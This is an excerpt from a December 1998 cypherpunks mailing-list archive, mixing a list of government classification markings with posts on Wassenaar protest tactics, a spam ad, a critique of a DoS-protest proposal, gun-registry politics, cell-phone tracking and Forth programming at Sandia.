the Atomic Energy Act of 1954. Unauthorized disclosure subject to 
administrative and criminal sanctions.
[used for nuclear secrets that are below CNWDI]

FORMERLY RESTRICTED DATA - Unauthorized disclosure subject to
administrative and criminal sanctions. Handle as RESTRICTED DATA in foreign
dissemination. Section 144b, AEC 1954.
[this label applies to nuclear secrets that have been transferred to a 
military agency from the
Department of Energy or its predecessor, the Atomic Energy Commission]

LIMITED DISSEMINATION
[used on information in Special Access Programs]
LIMDIS

FOREIGN GOVERNMENT INFORMATION
[classified material that originated with a US ally]
FGI

COSMIC TOP SECRET
[NATO (North Atlantic Treaty Organization) document that is classified 
TOP SECRET]

NATO SECRET

NATO CONFIDENTIAL

NATO RESTRICTED

ATOMAL
[NATO nuclear secrets]

NOT RELEASABLE TO CONTRACTORS/CONSULTANTS
[this might be used if the powers-that-be are discussing cancelling a 
contract with an aerospace company...]
NOCONTRACT

CAUTION - PROPRIETARY INFORMATION INVOLVED
[this marking is used on documents that would prove harmful to a company. 
For example, it could
be marked on TRW documents that weren't supposed to go to Martin Marietta 
Co.]
PROPIN

REPRODUCTION REQUIRES APPROVAL OF ORIGINATOR OR HIGHER
GOVERNMENT AUTHORITY.

CLASSIFIED BY MULTIPLE SOURCES

NOT RELEASABLE TO FOREIGN NATIONALS
[under no circumstances can this data be released, not even to a US ally]
NOFORN
[this is the dreaded NOFORN marking that Cliff Stoll jokingly said meant 
'No Fornication' in his
book "The Cuckoo's Egg"...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 16 Dec 1998 02:11:33 +0800
To: holist <cypherpunks@cyberpass.net
Subject: Holist comments
In-Reply-To: <199812151359.OAA05737@mail.elender.hu>
Message-ID: <v0313030cb29c443267d0@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain




(Note: Please insert a Subject: line if your reader deletes the existing
subject. And please don't keep using "cypherpunks@toad.com," as that ceased
to be the list address a long time ago.)


At 5:59 AM -0800 12/15/98, holist wrote:

>Well, just imagine those one-day strikes becoming a kind of craze on the
>internet.
>Be honest now, you could do with one day a week when you simply avoided the
>frizzy screen, perhaps even two (heard about two-day week-ends, pal? When I
>went to school in seventies Hungary, we were allowed off every second
>Saturday as a great favour!)
>
>People could use their leisure-time, their time off-line, as capital, just
>by timing it with a little care! Boycott-brokerage! You'd be borrowing the
>muscle of the entire network: after all, they'd not be kind to anyone who
>somehow or other pissed customers off enough to drop network traffic by 10
>percent?

Now you're moralizing that we should use the Net less. A rehash of the old
"some of us have a life" cliche.

If you wish to be off the Net once a week, go for it. Just don't confuse
this with either having a life or making a politically interesting point.

--Tim May



Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: list@listme.com
Date: Wed, 16 Dec 1998 01:07:59 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Is Your Listing A Secret?
Message-ID: <199812151605.LAA16345@listme.com>
MIME-Version: 1.0
Content-Type: text/plain



     We'll promote it to 50 search engines and indexes for $90
     and complete the job in 2 business days.  Satisfaction is
     guaranteed!

If you have a great product, but are not getting many inquiries from
your Web site, you may not be adequately listed on the Web's search
engines and indexes.

Millions of viewers daily use these facilities to find the products
and services they are looking for.  But if your site is not listed, no
one will see it.

Listings on most of these services are free.  However, locating and
filling out the forms required to get a listing can take several days,
and most people just don't have the time to do it.

That is why we offer a web site promotion service.

WHAT'S THE DEAL?

We will submit your site to 50 indexes and search engines for $90.  We
will accept the return of this E-mail, with the form below filled out,
as an order.  We will bill you upon completion of the promotion.  Our
terms are net 15 days from date of invoice.  Satisfaction guaranteed!

HOW LONG WILL IT TAKE?

Generally, we complete the submissions within 48 hours of
receiving your order.  It can take any individual search engine or
index up to three weeks to process your submission, although most are
much faster.

WHAT SEARCH ENGINES AND INDEXES ARE INCLUDED IN THE
PROMOTION?

The list changes from time to time.  This is our current list:

Alta Vista, Anzwers, AOL Netfind, BizCardz Business Directory, Bizlink,
BizWeb, Black Widow Search, Excite, Galaxy, HotBot, Infomak, Infoseek, 
InfoSpace, InterBis, Jayde Online Directory, Jumpcity, Jumper Hot Links, JumpLink, 
LinkMonster, Lycos, MangaSeeker, Manufacturers Information Network, 
Net Happenings, Net Announce, New Page List, New Riders WWW Yellow Pages, 
Northern Light, One World Plaza, PeekABoo, Planet Search, Power Crawler, 
QuestFinder, Scrub The Web, Seven Wonders, SiteFinder, SiteShack, Super Snooper, 
The YellowPages.com, TurnPike, Unlock: The Information Exchange, WebCrawler, 
WebVenture Hotlist, WhatUSeek, Where2Go, WhoWhere, World Announce Archive, 
Wow! Web Wonders!, YeeHaa!, Yellow Pages Superhighway, YelloWWWeb, Your Webscout, 
ZenFinder.


HOW WILL I KNOW THAT YOU HAVE PROMOTED MY SITE?

When we have completed the promotion, we will send you an HTML
file as an attachment to your E-mail bill.  Save this file to your
disk, and view it through your Web browser.  It provides links to the
search engine we submitted your site to, plus any comments we received
from them when we did it.

ARE THERE ANY GUARANTEES?

We do not require prepayment.  Your satisfaction is guaranteed or
you don't pay the bill.

WHO IS LISTME?

We are a web site promotion company located at:

   ListMe, Inc.
   1127 High Ridge Road - Suite 184
   Stamford, CT 06905
   Phone: (888) 205-5347
   Fax:   (800) 321-6966
   Email: list@listme.com
   Website: www.listme.com


HOW DO I ORDER?

The easiest way to order is through our on-line order form at
www.listme.com.  Or you can order by e-mail.  Just hit the REPLY button on
your e-mail program and fill out the following information. (This
information will be posted to the search engines/indexes):

Your name: 
Company Name:
Address:
City:              State/Prov:     Zip/Postal Code: 
Telephone: 
Fax: 
Email address: 
URL:  http://
Site Title: 
Description (about 25 words): 
Key words (maximum of 25, in descending order of importance):

Contact (in case we have questions): 

If  billing a different address, please complete the following:

Addressee: 
Company Name:
Address:
City:              State/Prov:     Zip/Postal Code: 
Telephone: 
Fax: 
Email address: 

We will bill via Email. (A8 12/15/98)

Terms:  By returning this document via Email, you agree as follows:
You have the authority to purchase this service on behalf of your
company.    Terms are net 15 days.  Accounts sent to collections will
be liable for collection costs.  You agree to protect and indemnify
ListMe, Inc. in any claim for libel, copyright violations, plagiarism,
or privacy and other suits or claims based on the content or subject 
matter of  your site.

WHAT HAPPENS NEXT?

When we receive your order, we will acknowledge it via return email. 
We will then input your information into our system.

When completed, we will run your promotion, capturing any comments
from search engines as we go.  We will incorporate these into an
HTML-formatted report to you, which we will attach to your bill.
======================Web Site Promotions======================
                      ListMe, Inc.
              1127 High Ridge Road - Suite 184
                   Stamford, CT 06905
                     www.listme.com
Ph: 888-205-5347  Fx: 800-321-6966  E-mail: list@listme.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Wed, 16 Dec 1998 02:26:30 +0800
To: dcsb@ai.mit.edu
Subject: DoS considered harmful [WAS: RE: Anyone striking?]
Message-ID: <D104150098E6D111B7830000F8D90AE84DDFC6@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone using the name Carlos Gomes [GomesC@netsolve.net] 
wrote:

> [...]
> There were several ideas floating around: a) detach
> from the net and from work b) create a signed letter of
> disapproval published to appropriate orgs c) _short_
> loosely organized burst of DoS against select online
> targets from widely distributed sources.

> All valid forms of protests (when properly organized
> and executed) all with varying forms of impact and
> visibility.  For the record, I think option c) could be
> a valid and effective form of active protest.  It is a
> form which has not been used in support of the cpunks'
> agenda (or many agenda's for that matter) to date and
> one that merits a review.
> [...]

> regards,
> C.G.

A DoS (Denial of Service) action is a really, really,
really bad idea.

It's both illegal and counterproductive. It's the sort
of thing I would expect to hear from an 'agent
provocateur' bent on discrediting critics of
government policy, by casting them as malicous hackers.

We went through this once before. Back when I was
getting the DES challenges going, some one proposed
that the target should be a live bank transaction (I
think in Germany). I argued strenuously against such a
move, and in favor of a specifically created target
This goal was fullfilled when I got RSA to set up and
sponsor the Symmetric Key Challenges.

If a group of people coordinated in any way to mount a
DoS attack, the effects would include:

1. Lump anyone taking an anti-Wassenaar position
together with a gang of destructive hackers.  This
would be a tremendous setback for the Good Guys, and
play straight into the hands of the those who would
remove freedom.

2. Anyone engaging in such an attack would face
real-world LEA investigation for computer hacking.

3. Anyone who discusses such an attack with anyone who
actually goes out and does it (other than to argue
against it, as I am doing) could be charged with
conspiracy.

[So, if any of you are idiotic enough to do this, do
the rest of us a favor, and keep your discussion to
private channels and *off* the mailing lists. I *don't*
want to know.]

4. Most importantly, It Would Be Wrong. As long as
legal channels exist to right the errors of government
policy, they should be used. That governments stoop to
dishonest, deceitful, and unconstitutional activities
(or activities 'legal' only in the Clintonian sense)
does not justify others abandoning the moral high
ground.

I don't think a strike is going to fly, either. What
might work is a Web page blackout, similar to that
done for the original CDA nonsense.

Peter Trei
ptrei@securitydynamics.com

[Disclaimer: In this message, I speak for myself only.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Wed, 16 Dec 1998 03:32:47 +0800
To: ari.hypponen@DataFellows.com
Subject: Re: MEDIA RELEASE: Data Fellows Joins the Microsoft Security  Partners Program
In-Reply-To: <3.0.32.19981215170136.0098ad60@smtp.datafellows.com>
Message-ID: <Pine.BSF.3.96.981215115917.269D-100000@support.noc.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Dec 1998, Marita Nasman-Repo Blathered:

:Helsinki, Finland, December 15, 1998-- Data Fellows, the global leader in
:developing data security software solutions, has been invited to join the
:Microsoft Security Partners Program.
"Invited"?   You mean they finally accepted your application, right?

:The Microsoft Security Partners Program
:(http://www.microsoft.com/security/partners) provides customers with the
:tools and information they need to establish, test and maintain effective
:information security for their computing infrastructure. 
By providing real-life examples of how NOT to implement security
practices.  By simply purchasing these failed products (at only *slightly*
exhorbitant prices), so can learn by example: see for yourself just how
easy it is to completely botch a security directive.  Witness how
thoroughly you can mangle password encryption.  Learn what major design
flaws *really* look like!

:The program brings
:together software manufacturers, security consultants and security
:trainers, making it even easier for customers to provide robust security in
:their Microsoft Windows NT operating system-based networks.
Just as soon as it becomes available?  Oh, BTW, when *will* that be???

:Three Data Fellows products are included in the Microsoft Security Partners
:Program. 
I'm sorry.  But don't worry, if you keep working on it, you'll be able to
sell it to a *real* vendor someday...

:F-Secure Workstation Suite consists of malicious code detection
:and removal as well as unobtrusive file and network encryption,
Very unobtrusive, I'm sure!  Does the attacker even know it's there?

: all
:integrated into a policy-based management architecture. 
Hmmm... Somebody's been playing with their buzzword-generator again :)

:F-Secure VPN+
:provides a software-based, IPSec/IKE VPN solution scaleable for large
:corporate networks as well as remote and small office networks.
Was that IPSec/IKE, or IPSec-like?  I vote for the latter.  It's just like
IPSec, but without wasting all those nasty cycles on dumb things - like
encryption: it's *so much* more user-friendly when it doesnt [further]
slow the speed of new window open/closes...

: F-Secure
:FileCrypto is the first and only product to integrate strong real-time
:encryption directly into the Windows NT-based file system.
Could be, we already know that Micro$loth has *no clue* when it comes to
these things (Right Paul???)...

:"Microsoft is pleased to include Data Fellows as part of its Security
:Partners Program," said Karan Khanna, Windows NT Security Product Manager
:at Microsoft Corp.
Of course you are.  Micro$loth would be pleased to welcome Joseph Stalin
into the Security Partners Program.

: "This program will help our mutual customers develop and
:deploy secure solutions built on the Windows NT platform."
Just as soon as they can get Windows NT to run faster than a 6809 with 1k
of 512ns RAM and a single parallel port for IO ;-)

:"The relationship with Microsoft shows Data Fellows' commitment to improve
:the native security of standalone and networked computers with a
:comprehensive, centrally managed suite of security services," said Risto
:Siilasmaa, president and CEO of Data Fellows. 
You're *that* worried about Micro$loth's current offerings, huh?
Personally, I'd let them fend for themselves, but...

:"Data Fellows is committed to
:providing globally available 
And this *IS* your *FIRST* priority, isn't it?

:seamless security for Windows users; security
:that is strong yet easy to manage and economical."
Great!  Let me know when it's available!

:Data Fellows is one of the world's leading developers of data security
:products.
Really?  Who decided that?  Do you have any research to back up this
awe-inspiring claim?

: The company develops, markets and supports anti-virus, data
:security and cryptography software products for corporate computer
:networks.
That's only because most of the private networks already know better.


Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DOOM Anonymous Untraceable User <nobody@seclab.com>
Date: Tue, 15 Dec 1998 21:06:31 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199812151225.NAA04157@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



"No dictator, no invader, can hold an imprisoned population by the force of arms forever. There is no
greater power in the universe than the need for freedom. Against that power governments, and
tyrants, and armies can not stand. The Centauri learned this lesson once. We will teach it to them
again. Though it take a thousand years, we will be free." 

        -- G'Kar in Babylon 5: "The Long, Twilight Struggle"

#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 16 Dec 1998 07:38:13 +0800
To: "The Montreal Gazette" <Martin.P@parl.gc.ca>
Subject: Fwd: Anne McLellan's voters reject gun registration...
Message-ID: <199812152242.RAA05466@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



==================BEGIN FORWARDED MESSAGE==================
>Received: from bernie.compusmart.ab.ca (bernie.compusmart.ab.ca 
[199.185.131.34])
>	by cti13.citenet.net (8.9.1/8.9.1) with ESMTP id NAA22703
>	for <jf_avon@citenet.net>; Tue, 15 Dec 1998 13:02:25 -0500 (EST)
>Received: from remote322.compusmart.ab.ca ([206.75.84.147]:1035 "EHLO 
compusmart.ab.ca") by mail.compusmart.ab.ca with ESMTP id <409327-12752>; Tue, 
15 Dec 1998 10:52:54 -0700
>Message-ID: <3676A210.9C6687B8@compusmart.ab.ca>
>Date: 	Tue, 15 Dec 1998 10:53:20 -0700
>From: Peter Kearns <kearns@compusmart.ab.ca>
>Organization: KEARNS & McMURCHY
>X-Mailer: Mozilla 4.04 [en] (Win95; I)
>MIME-Version: 1.0
>To: Canadian Firearms Digest <cdn-firearms-digest@sfn.saskatoon.sk.ca>,
>        "Anne Mclellan (Parliament)" <McLellan.A@parl.gc.ca>,
>        Bernard Johnston <johnston@pacific.net.sg>,
>        Bob Burgess <dq2@monarch.net>, Bob Lickacz <firearms@planet.eon.net>,
>        Brad Browne <coffee@ns.sympatico.ca>,
>        Dale Blue <bluedl@telusplanet.net>,
>        David Tomlinson <nfadat@telusplanet.net>,
>        Don Davies <nstn2906@fox.nstn.ca>,
>        Donna Ferollie <donnaferolie@sympatico.ca>,
>        Frank Szojka <dszojka@compusmart.ab.ca>,
>        Frank Williamson <afss@connect.ab.ca>,
>        Garry Breitkreutz <BreitG0@parl.gc.ca>,
>        Gordon Hitchen <acardin@v-wave.com>,
>        Jean-Francois Avon <jf_avon@citenet.net>,
>        Jim Hinter <jhinter@shopnfa.com>,
>        "John St. Amour" <marstar@hawk.igs.net>,
>        LE QUEBECOIS LIBRE <libre@colba.net>,
>        Manuel De La Paz <simonjes@hotmail.com>,
>        Mark Hughes <mkhughe@north.nsis.com>,
>        Pierre Bourque <pierre@achilles.net>,
>        Lorne Gunter <lgunter@thejournal.southam.ca>,
>        Shafer Parker <shaferp@sprynet.com>,
>        Pat & Mike Ryan <theryans@sympatico.ca>,
>        Paul Bennett <paul.bennett1@sympatico.ca>,
>        Paul Rogan <firearms@hypertech.yk.ca>, Peekay <peter@firearms.ab.ca>,
>        Peter Cronhelm <cronhelm@nucleus.com>,
>        Peter Figol <pjfigol@canada.com>, Ken Epp <Epp.K@parl.gc.ca>,
>        Preston Manning <Manning.P@parl.gc.ca>,
>        Jack Ramsay <Ramsay.J@parl.gc.ca>, Deb Grey <Grey.D@parl.gc.ca>,
>        Monty Solberg <Solberg.M@parl.gc.ca>,
>        Raheem Jaffer <Jaffer.R@parl.gc.ca>,
>        "Robin Leech \"SPIDERMAN\"" <robinl@connect.ab.ca>,
>        Tony Bernardo <teebee@sprint.ca>
>Subject: Anne McLellan's voters reject gun registration...
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>X-UIDL: ddaaa1595eab8ceea7515c82b013fcca
>

"The Edmonton Examiner" a local community newspaper, ran an
editorial entitled "Gun lobby has a point."  In it they
accused the "pro-gun" faction of posturing and paranoia, but
then went on to say the so called "lobby" is correct in it's
assessment of the registry.  The paper  said, "the
government has failed to show how gun registration will
reduce crime, which is the sole reason for registration."  

	The newspaper also asked how would knowing that people own
rifles deter crimes, while "the new law does nothing to
deter the easy access to guns smuggled in from the U.S." 
Another statement follows, "and of course the criminal
element has no interest in registering guns."  The editor
makes one last telling remark, "So exactly what is the
point? Essentially, it is to gather information.  All
governments love information, the more the better.  But
there is no proof at all that registering guns deters
criminal activity."

	Sounds like an editor sounding off..... Right?   What
follows indicates the writer likes to do a little
investigative journalism.... The editor then conducted a
telephone poll asking the question "ARE YOU IN FAVOUR OF THE
GOVERNMENTS GUN REGISTRY PROGRAM?  (Remember folks, the
constituents of "Idle Annie" had their say in this poll.) 
The results were 76%  AGAINST the registration program with
24% in favour..... Oh dear, Annie..... You'd better hope
they change their minds come election time......  

	Comments from those opposed to the registry, "I have never
owned a gun, but I resent this program which smacks of a
police state."  Another said, "I have yet to undertstand how
having the gun registered that killed those students in
Montreal registered would have prevented that terrible
deed." The last and most telling,  "It is simply a way to
enable the confiscation of firearms in order to prevent any
insurrection or revolt against a government that may be
imposing oppressive measures."

	The usual comments equating registering cars and guns, and
the "only one life" bleat came from the 24% who actually
liked the registry.  One even said "Gun owners have to wait
hours to get their guns, instead of minutes.  Get over it
you big whiny crybabies."  (Kinda makes you question the
maturity of that one!)

	The polls are turning in our favour, and they are doing so
because we are educating the public.  The more they know
about the registration process and the costs, the less they
like the idea.  We have accomplished this without breaking
any laws, and without the need to indulge in civil
disobedience.  If we break (even unjust) laws and engage in
publicised acts of civil disobedience then we will lose. 
The newsmedia will then (rightly) portray us as a bunch of
right wing fanatics, and elements of the lunatic fringe. 
The NFA has proved we can be heard, and that the public is
seeing things our way without the need to engage in silly
demonstrations.  Let's see how far we can go within the law,
during the next four years.
regards,
Peter Kearns
NFA Communications

Simon says:  "Well what about it Annie?  What do your spin
doctors have to say about a poll that included the people
who voted in the last election in Edmonton West?  (Weren't
you elected to represent the views of the people who voted
for you?)...........


===================END FORWARDED MESSAGE===================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony@secapl.com
Date: Wed, 16 Dec 1998 04:36:16 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: First "Crypto Refugee"?
In-Reply-To: <199809040233.TAA29401@netcom13.netcom.com>
Message-ID: <Pine.A32.3.95.981215140228.21958G-100000@T2.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain




> the shakespeare analysis seems like a good idea to
> me. I am not aware of literate papers that try to
> analyze it with frequency analysis instead of
> just vague assertions by the authors. there is
> a huge set of literature that tries to link of
> the writings of shakespeare to someone else, but 
> as far as I know not much of it is computer analysis.

  This was what brought William Freidman to Riverside, where he both
created monographs on cryptanalysis and met his wife. (described in detail
in Kahn.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: holist <holist@elender.hu>
Date: Tue, 15 Dec 1998 22:36:55 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812151359.OAA05737@mail.elender.hu>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

>Clearly the Wassenaar folks will be so influenced by a few thousands
>computer users withdrawing from the Net for one frigging day that they will
>rethink their Orwellian plans and will admit their crimes in an orgy of
>self-criticism.

Like the Irony.

But. I striked (or is it stroke?).

Largely as practice - not checking my e-mail for a continuous 24 hours was a
major spiritual trial. In return, I discovered a whole range of alternative
ways of spending evenings. You may have heard that in several countries in
Europe, telephone strikes by the public were successful in bringing
telephone prices down radically. Similar strikes by interenet users were
also successful in obtaining special deals, such as *flat rate local calls*
(a brand new buzzword in the hereabouts), at least on internet calls. What I
mean to say is there's a place for a strike.

>The _only_ motivation was to induce journalists to give the think a few
>column inches, if even that. "Hundreds of geeks cut their noses off to
>spite their faces...details on page 75."

Well, just imagine those one-day strikes becoming a kind of craze on the
internet.
Be honest now, you could do with one day a week when you simply avoided the
frizzy screen, perhaps even two (heard about two-day week-ends, pal? When I
went to school in seventies Hungary, we were allowed off every second
Saturday as a great favour!)

People could use their leisure-time, their time off-line, as capital, just
by timing it with a little care! Boycott-brokerage! You'd be borrowing the
muscle of the entire network: after all, they'd not be kind to anyone who
somehow or other pissed customers off enough to drop network traffic by 10
percent?

Exporting PGP within minutes of its release...now _that's_ a meaningful
action! (And one which Cypherpunks continue to be good at.)

How meaningful exactly? How do you know who gets it? The truly valuable work
is the creation of the social structures wherein such exportation could be
truly meaningful. I don't see a lot of that (perhaps you'll smirk and say
they hid themselves too well). It is quite clear to me that educating the
public is imperative: if people haven't got a clue as to what strong
cryptography is, etc. then they're not going to remember something as
foreign as Wassenaar even if it is on the evening news. But surruptitiously
spreading PGP to other countries doesn't seem to do a great deal of that.

What does?

Hacker activities that are illegal and dangerous and probably difficult,
too, have obvious potential.

But I think there must also be legal options.

comments, please



Let's leave the "National Solidarity Against Racist Policies" crapola to
the lefties.

--Tim May




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 16 Dec 1998 05:39:20 +0800
To: Secret Squirrel <cypherpunks@cyberpass.net
Subject: Re: IP: Cell phone tapping stirs debate
Message-ID: <199812152028.PAA20269@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Cellphones are not going to make great tracking devices in the future.

I was just visiting the UK and checking out how the cellphone industry has
been developing there.

"Pay as you call" phones are the fastest-growing segment of the industry.
You can buy a phone for as little as 49 GBP ($83).  Cellnet sells one for
69 GBP ($117) that works on the Continent as well.  You can buy the cards
to "feed" these phones from hundreds of UK vendors.

Throw away phones are becoming popular in the US as well.  As prices
decline towards the $20 level, it will be increasingly difficult for the
authorities to track the huge number of anonymously purchased disposable
phones. 

DCF

"Did you hear the one about the Chinese contractor who promised Burlington
Coat Factory jackets trimmed with cainus latrans but substituted canis
familiaris instead?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <secret_squirrel@nym.alias.net>
Date: Wed, 16 Dec 1998 02:02:33 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Cell phone tapping stirs debate
Message-ID: <a2ff6ac816fe40184e047a01451bd7be@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>From <http://www.ksfy.com/topstory.htm>:

Last updated: 11:00 P.M. Thursday, December 10th, 1998. 

                    HIGH SPEED CHASE AND SUSPECT ARREST

                    Cpl. Kevin Grebin/S.D. Highway Patrol: "It was the scanner traffic from his cell
                    phone that the officers picked up that enabled us to capture him."
                    A high speed chase and a cell phone conversation ends with one man in jail...
                    Law enforcement officials from both Iowa and South Dakota chased the man at
                    speeds in excess of 100 miles an hour.
                    He was wanted on a Federal warrant for drug charges.
                    K-S-F-Y's Judeka Drogt and Chief Photographer Lonnie Nichols were there and
                    have the exclusive report.
                    Natural Sound Of Arrest Being Made As It Happened.
                    32-Year old Tracy Fanning was quietly led out of a farm field 6 miles North of
                    Lennox.
                    Natural Sound Of Officers Going Through Suspect's Pockets And Finding
                    Drugs.
                    Officers found methamphetamine and two knives on him.
                    This was the successful ending to a very long night for these officers.
                    It all began in Iowa...
                    That's where Fanning was spotted by the Iowa State Patrol.
                    The chase began after they learned he was named in a Federal drug warrant.
                    He crossed into South Dakota around 11:30 p.m.
                    Fanning dumped his car at a rural home and ran...
                    As Police followed him they had no idea what they were facing.
                    Cpl. Kevin Grebin/S.D. Highway Patrol: "There was some ammo there that we
                    could not find a weapon to so we weren't sure if he had the weapon on him
                    when he took off."
                    For the next 3 and a half hours Police used dogs and spotlights to search for
                    him.
                    That's not all.
                    Fanning was using a cell phone to call a contact...
                    He was hoping to be picked up...
                    Instead it was the Police that were "picking up" his conversation...
                    And his location.
                    Fanning's last phone call led officers to his hiding place.
                    Fanning was taken to the Minnehaha County Jail at 3:30 Thursday morning.





                    LENNOX CHASE FOLLOW-UP

                    Drug crimes, high speed police chases and manhunts are something many folks
                    think happen only in big cities.
                    But as we've shown you exclusively, that's not the case.
                    K-S-F-Y's Brian DeRoy takes us to the site of this morning's manhunt.
                    Betty Vanderwerf/Rural Lennox Resident: "You just don't want to go out in
                    those trees in the daytime at least until somebody else could be caught."
                    Betty Vanderwerf is still shaken about all the police cars near her rural Lennox
                    home.
                    Betty Vanderwerf/Rural Lennox Resident: "It makes you feel like you don't even
                    want to take the dog out for a walk after dark, and you just want to keep your
                    doors locked."
                    Back where police finally caught up with Tracy Fanning...it was only after quite
                    a long search...
                    The suspect was running for a long time including back over in an area near
                    Betty Vanderwerf's house.
                    They located Fanning just behind some trees is where Betty Vanderwerf lives.
                    Betty Vanderwerf/Rural Lennox Resident: "Hopefully you don't think he's a
                    killer out on the run, he's just getting away from authorities for his problem."
                    Things are quiet in downtown Lennox.
                    But the talk in the grocery store is how close the armed suspect was to town.
                    Verg Musch had his doors unlocked Wednesday night.
                    Verg Musch/Lennox Resident: "Grew up in the country and from there into a
                    small town like this, I would imagine most of the people don't."
                    Well, maybe not.
                    Brian DeRoy/Dakota First News: "How many of you lock your doors at night,
                    raise your hands...most of you."
                    Lennox Resident #1: "We just always do, I don't know, always have."
                    Lennox Resident #2: "I'm on the highway and I'm just afraid if I'm alone at
                    night."
                    Back outside town, Betty won't be taking country living for granted anymore.
                    Betty Vanderwerf/Rural Lennox Resident: "It just kind of goes to show when
                    you go to bed at night, lock your doors."
                    A reality no matter what your address.
                    Lennox is still a pretty sleepy place.
                    The town has only three full-time Police officers.






So was it really intercepted cell phone traffic on a police 
scanner, or did they get his location from the cell phone 
company?


#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




>
>From: believer@telepath.com
>Subject: IP: Cell phone tapping stirs debate
>Date: Sun, 25 Oct 1998 08:49:06 -0600
>To: believer@telepath.com
>
>Source:  USA Today
>http://www.usatoday.com/life/cyber/tech/ctd698.htm
>
>10/22/98- Updated 12:08 PM ET
> The Nation's Homepage
>
> Cell phone tapping stirs debate
>
> WASHINGTON -- Law enforcement officials say they need to
> know where a suspected criminal is when he makes a cellular
> telephone call. Federal regulators are proposing to give them the
> capability to find out.
> ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 16 Dec 1998 08:37:42 +0800
To: jy@jya.com
Subject: crypto boredom
Message-ID: <3676F8D0.52EE@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain



Tuesday 12/15/98 4:37 PM

John Young

Seeing http://jya.com/kea-errata.htm makes me feel good that I am 
not doing crypto work anymore.

I talked with Kent Parsons this afternoon at Holman's computer.

Parsons was the department manager who was going to make his claim-to-
fame at Sandia on the Forth code we developed. "We aren't getting the
recognition [for Forth] we deserve." was a Parsons quote.

I told Parsons that the Forth code we developed is executing all over
the world.

Jane Ellson was one of Parson's secretaries when we did the
Forth 8085 and 8051 development in the weapons components department.

Ellson is now Sandia president Paul Robinson's secretary.

I need to revise my NSA-funded and Sandia-approved Forth book for the
80c32 and windows.  
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2 

I saw http://jya.com/intel120898.htm.

NSA's Forth expert Donald Simard talked to me about putting Forth on a
x86
PC as a stand-alone secure operating system.

Putting a secure RELIABLE operating system on a Pentium-class processor
will
be a MAJOR task.  Perhaps more than just building a rad hard version of
the chip.

Parsons also led the effort at Sandia to build the 8051 as a rad hard
chip at Sandia to replace Sandia's rad hard 8085 chip SET.

Forth works great for weapons programmers.  

We need to get this unfortunate matter settled so that we can ALL move
on to more constructive projects.

Later
bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Antonomasia <ant@notatla.demon.co.uk>
Date: Wed, 16 Dec 1998 03:02:02 +0800
To: cypherpunks@Algebra.COM
Subject: Reminder: key changes at notatla
Message-ID: <199812151744.RAA00598@notatla.demon.co.uk>
